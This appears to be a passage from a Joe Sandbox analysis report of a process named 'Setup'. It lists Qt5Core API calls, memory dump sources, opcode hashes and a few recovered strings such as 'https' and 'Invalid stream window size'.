                                                                                                                                                              • ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1A01DC8), ref: 00007FFBA1A03F09
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array$Data@@$?data@$U1@_$?allocate@?deallocate@AllocationData@@@@@Flags@Option@memmove
                                                                                                                                                              APIs
                                                                                                                                                              • ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,00000000,00007FFBA19E475E,?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E5566
                                                                                                                                                              • ?firstNode@QHashData@@QEAAPEAUNode@1@XZ.QT5CORE(?,?,00000000,00007FFBA19E475E,?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E5573
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,00000000,00007FFBA19E475E,?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E558E
                                                                                                                                                              • ?firstNode@QHashData@@QEAAPEAUNode@1@XZ.QT5CORE(?,?,00000000,00007FFBA19E475E,?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E55AB
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,00000000,00007FFBA19E475E,?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E55CE
                                                                                                                                                              • ?firstNode@QHashData@@QEAAPEAUNode@1@XZ.QT5CORE(?,?,00000000,00007FFBA19E475E,?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E55E7
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,00000000,00007FFBA19E475E,?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E5600
                                                                                                                                                              • ?unlock@QMutex@@QEAAXXZ.QT5CORE(?,?,00000000,00007FFBA19E475E,?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E5611
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@HashNode@Node@1@$?first?nextU21@@$Mutex@@$?lock@?unlock@
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?size@$?data@Char@@Data@@List$?begin@?end@memcmp
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?data@ArrayData@@$?utf16@ChangeCloseCreateEventHandleNotifyOpenString@@Value
                                                                                                                                                              APIs
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A28187), ref: 00007FFBA1A2A2D2
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A28187), ref: 00007FFBA1A2A314
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A28187), ref: 00007FFBA1A2A329
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A28187), ref: 00007FFBA1A2A338
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A28187), ref: 00007FFBA1A2A349
                                                                                                                                                              • ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A28187), ref: 00007FFBA1A2A3DF
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array$Data@@$?data@U1@_$?allocate@AllocationData@@@@@Flags@Option@$?deallocate@
                                                                                                                                                              APIs
                                                                                                                                                              • ??8QUrl@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,00007FFBA19714D9), ref: 00007FFBA1984505
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA19714D9), ref: 00007FFBA1984531
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA19714D9), ref: 00007FFBA198453D
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FFBA19714D9), ref: 00007FFBA198454F
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FFBA19714D9), ref: 00007FFBA198455C
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FFBA19714D9), ref: 00007FFBA1984569
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B625
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B630
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B642
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B64E
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B65A
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,00007FFBA19714D9), ref: 00007FFBA19845D1
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?size@Data@@ListString@@$?begin@?data@Char@@$??8@?end@String@@0@Url@@V0@@
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Variant@@$Latin1String@String@@@
                                                                                                                                                              • String ID: ActiveConfiguration
                                                                                                                                                              • API String ID: 2432152112-2333711730
                                                                                                                                                              • Opcode ID: 204c01ba69b34e6afd63b629deecf088931b663f94db476ffb573a8977c1284a
                                                                                                                                                              • Instruction ID: e4edaa4a74af7c46218295842dc542cd5246223767c0f6a58ec67b95ab22f4ed
                                                                                                                                                              • Opcode Fuzzy Hash: 204c01ba69b34e6afd63b629deecf088931b663f94db476ffb573a8977c1284a
                                                                                                                                                              • Instruction Fuzzy Hash: 97316272609A8286FB91DF25E4402A97360FF84BA8F484131EF9D47A59EF3CD546CF10
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA197D660: ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D6A0
                                                                                                                                                                • Part of subcall function 00007FFBA197D660: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D6C0
                                                                                                                                                                • Part of subcall function 00007FFBA197D660: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D6D8
                                                                                                                                                                • Part of subcall function 00007FFBA197D660: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D777
                                                                                                                                                                • Part of subcall function 00007FFBA197D660: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D785
                                                                                                                                                                • Part of subcall function 00007FFBA1973D20: ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE ref: 00007FFBA1973D56
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B1F
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFBA1973B36
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B42
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B54
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1973B77
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B92
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B9E
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1973BC6
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1973C27
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1973C35
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973C3E
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1973C50
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197ABEA
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA197AC78
                                                                                                                                                                • Part of subcall function 00007FFBA1A562A0: EnterCriticalSection.KERNEL32(?,?,?,00007FFBA1A1EA6A,?,?,?,00007FFBA1A36395), ref: 00007FFBA1A562B0
                                                                                                                                                                • Part of subcall function 00007FFBA1A562A0: LeaveCriticalSection.KERNEL32(?,?,?,00007FFBA1A1EA6A,?,?,?,00007FFBA1A36395), ref: 00007FFBA1A562F0
                                                                                                                                                              • ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197AC89
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197ACA1
                                                                                                                                                                • Part of subcall function 00007FFBA1A56300: EnterCriticalSection.KERNEL32(?,?,?,00007FFBA1A1EA32,?,?,?,00007FFBA1A36395), ref: 00007FFBA1A56310
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA197AD1F
                                                                                                                                                              • ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197AD30
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197AD48
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$Byte$?begin@Array@@$String@@$ArrayCriticalDataPtr@@@SectionV0@@$?dispose@?end@Data@1@@EnterInit_thread_footer$?detach_grow@?lock@Data@1@LeaveMutex@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 868051027-0
                                                                                                                                                              • Opcode ID: d071dbf924aed4100ed30baeedde15ab8a0ec9740476aae4e5032c2287e5c2a6
                                                                                                                                                              • Instruction ID: a6036032bd1f0dc950eea5aaeb06f75f5b9c1464c768a8939f1403dc3efd60df
                                                                                                                                                              • Opcode Fuzzy Hash: d071dbf924aed4100ed30baeedde15ab8a0ec9740476aae4e5032c2287e5c2a6
                                                                                                                                                              • Instruction Fuzzy Hash: D6410CA592EA8691EB82DF34E8402B53320FF44765F809132DD6E472A2EF3CE845CF14
                                                                                                                                                              APIs
                                                                                                                                                              • ?createShared@QNonContiguousByteDeviceFactory@@SA?AV?$QSharedPointer@VQNonContiguousByteDevice@@@@V?$QSharedPointer@VQRingBuffer@@@@@Z.QT5CORE ref: 00007FFBA197D8E2
                                                                                                                                                              • ?createShared@QNonContiguousByteDeviceFactory@@SA?AV?$QSharedPointer@VQNonContiguousByteDevice@@@@PEAVQIODevice@@@Z.QT5CORE ref: 00007FFBA197D913
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA197D984
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA197D98F
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteContiguous$Object@@Pointer@Shared$?createConnection@DeviceDevice@@@@Factory@@MetaShared@$?connect@Buffer@@@@@ConnectionDevice@@@Qt@@@RingType@
                                                                                                                                                              • String ID: 1emitReplyUploadProgress(qint64,qint64)$2readProgress(qint64,qint64)
                                                                                                                                                              • API String ID: 3896897096-2170191149
                                                                                                                                                              • Opcode ID: b9031a44c94af3df9072fbd3d8a742f508e88202eab4e2e2363770a99b9a3247
                                                                                                                                                              • Instruction ID: cb373f2bf4421fca16f44f40afb5ed175b64ceb5c6cc7893c4d09212a73bf7ed
                                                                                                                                                              • Opcode Fuzzy Hash: b9031a44c94af3df9072fbd3d8a742f508e88202eab4e2e2363770a99b9a3247
                                                                                                                                                              • Instruction Fuzzy Hash: 2731C8B260AB4282EB91CF26E4402AA73E1FB85BA4F484032DE5E47754DF3CD546CF40
                                                                                                                                                              APIs
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1A21C29,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A21AEF
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1A21C29,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A21AFA
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?size@Data@@List
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 192315772-0
                                                                                                                                                              • Opcode ID: 2c89132d27d0c9bbcbd6bfa08c23af230b7ddfd09452e877cfcab4d30f518ea1
                                                                                                                                                              • Instruction ID: 774bf0e65c477d6188a1922f6e787b249cbb5913554fceb4e1924a3aec8d441b
                                                                                                                                                              • Opcode Fuzzy Hash: 2c89132d27d0c9bbcbd6bfa08c23af230b7ddfd09452e877cfcab4d30f518ea1
                                                                                                                                                              • Instruction Fuzzy Hash: C9217FA1A0A64242DF928B32EA4407993A1AF55BD4F085032DE6E07B65FE3CE4469F00
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE ref: 00007FFBA1A216FD
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A21708
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1A21722
                                                                                                                                                              • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE ref: 00007FFBA1A2178B
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A2416D
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??0QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A2417E
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??0QByteArray@@QEAA@PEBDH@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241A2
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ?fromBase64@QByteArray@@SA?AV1@AEBV1@@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241B0
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241C0
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241CB
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241D6
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A217AD
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A217D0
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A217EB
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteString@@$BasicTimer@@$?from?sharedArrayBase64@Data@@DateNull@Time@@V0@$$V0@@V1@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
• Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$BasicMutex@@Object@@Timer@@Url@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@Array@@Byte$?detach@?dispose@?end@Data@1@Data@1@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE(00000000,?,00000000,00007FFBA1A2576E), ref: 00007FFBA1A26C3F
                                                                                                                                                              • ??0QByteArray@@QEAA@$$QEAV0@@Z.QT5CORE(?,00000000,00007FFBA1A2576E), ref: 00007FFBA1A26C57
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA1A2576E), ref: 00007FFBA1A26C66
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA1A2576E), ref: 00007FFBA1A26C75
                                                                                                                                                                • Part of subcall function 00007FFBA1A24FA0: ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE(?,?,00000000,00007FFBA1A256B9), ref: 00007FFBA1A24FD6
                                                                                                                                                                • Part of subcall function 00007FFBA1A56300: EnterCriticalSection.KERNEL32(?,?,?,00007FFBA1A1EA32,?,?,?,00007FFBA1A36395), ref: 00007FFBA1A56310
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1A26CEC
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Array@@$ArrayDataPtr@@@$A@$$CriticalEnterInit_thread_footerSectionV0@@
                                                                                                                                                              • String ID: ---
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@ListLocker@@Mutex$?begin@?end@?lock@Mutex@@
                                                                                                                                                              • String ID: https
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Char@@$Char@@@Latin1$String@@$?data@Initialization@Qt@@@
                                                                                                                                                              • String ID: 0123456789ABCDEF
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Base@@$Node$?set$Parent@U1@@V0@@$?color@?createArray@@ByteColor@Color@1@Color@1@@DataNode@U2@_Variant@@
                                                                                                                                                              • String ID:
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Base@@$Node$?set$Array@@ByteParent@U1@@V0@@$?color@?createColor@Color@1@Color@1@@DataNode@U2@_
                                                                                                                                                              • String ID:
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A28029
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A28034
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A2804E
                                                                                                                                                              • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE(?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A280B7
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A2416D
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??0QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A2417E
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??0QByteArray@@QEAA@PEBDH@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241A2
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ?fromBase64@QByteArray@@SA?AV1@AEBV1@@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241B0
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241C0
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241CB
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241D6
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A280D9
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A280FC
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A28117
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
• Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteString@@$BasicTimer@@$?from?sharedArrayBase64@Data@@DateNull@Time@@V0@$$V0@@V1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 318536080-0
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA198414C), ref: 00007FFBA19D9E6A
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA198414C), ref: 00007FFBA19D9E8F
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA198414C), ref: 00007FFBA19D9E9D
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA198414C), ref: 00007FFBA19D9EAD
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA198414C), ref: 00007FFBA19D9EB8
                                                                                                                                                                • Part of subcall function 00007FFBA19D9BF0: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,000000E8,00007FFBA19D9E57,?,?,?,?,?,?,?,?,00000000,00007FFBA198414C), ref: 00007FFBA19D9C30
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Debug@@$Logger@@Message$?warning@BasicCategory@@Enabled@H00@LoggingTimer@@Warning
                                                                                                                                                              • String ID: Invalid stream window size
                                                                                                                                                              • API String ID: 3560238351-1021882108
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1984162), ref: 00007FFBA19D9DDA
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1984162), ref: 00007FFBA19D9DFF
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1984162), ref: 00007FFBA19D9E0D
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1984162), ref: 00007FFBA19D9E1D
